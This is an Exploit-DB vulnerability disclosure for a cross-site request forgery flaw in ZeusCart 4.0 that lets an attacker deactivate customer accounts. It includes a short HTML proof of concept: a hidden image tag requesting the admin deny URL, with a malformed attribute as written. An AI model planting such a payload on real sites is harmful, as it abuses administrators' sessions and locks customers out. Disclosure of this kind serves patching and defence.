ZeusCart 4.0 - Cross-Site Request Forgery (Deactivate Customer Accounts)

EDB-ID:

46027

CVE:

N/A


Author:

mqt

Type:

webapps


Platform:

PHP

Date:

2018-12-21


Become a Certified Penetration Tester

Enroll in Penetration Testing with Kali Linux and pass the exam to become an Offensive Security Certified Professional (OSCP). All new content for 2020.

GET CERTIFIED

# Exploit Title: ZeusCart 4.0 Deactivate Customer Accounts CSRF
# Date: 12/20/2018
# Exploit Author: mqt
# Vendor Homepage: http://http://www.zeuscart.com/
# Version: Zeus Cart 4.0 CSRF

1. Vulnerability Description

Due to the form not being validated, ZeusCart4.0 suffers from a Cross
Site Request Forgery vulnerability, which means an attacker can
perform actions on behalf of a victim, by having the victim visit an
attacker controlled site.

In this case, the attacker is able to "deactivate" any customer
accounts, which means that the account is banned and cannot login.

Proof of Concept:
<html>
	<body>
		<img style="display:none"msrc="http://localhost/admin/?do=regstatus&action=deny&id=2" alt="">
	</body>
</html>